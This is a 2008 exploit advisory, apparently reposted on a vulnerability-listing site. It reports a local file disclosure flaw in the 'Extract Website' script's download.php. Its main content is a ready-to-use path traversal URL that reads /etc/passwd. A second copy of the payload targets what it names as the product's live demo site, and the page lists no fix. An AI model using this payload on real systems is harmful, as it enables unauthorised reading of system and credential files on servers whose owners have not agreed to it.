Extract Website (download.php filename) File Disclosure Vulnerability

2008-12-19 20:03:53

Extract Website (download.php filename) Local File Include

# author : Cold z3ro, http://www.hackteach.org/
# script : http://secure.emetrix.com/order/product.asp?PID=74332316
# demo : http://www.rightscripts.com/extractwebsite/
# about : This tool help you extract web data include URL links,
domain names, contact emails, keywords, meta tags, page titles
or text from other website.
You can extract these data from a list of website links or from simple text.


# Exploit

[~] http://www.site.com/[path]/download.php?filename=../../../../../../../../etc/passwd



# Example

[~] http://www.rightscripts.com/extractwebsite/download.php?filename=../../../../../../../../etc/passwd


==================================
Greetz : www.hackteach.org members , AnGeL25dZ

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.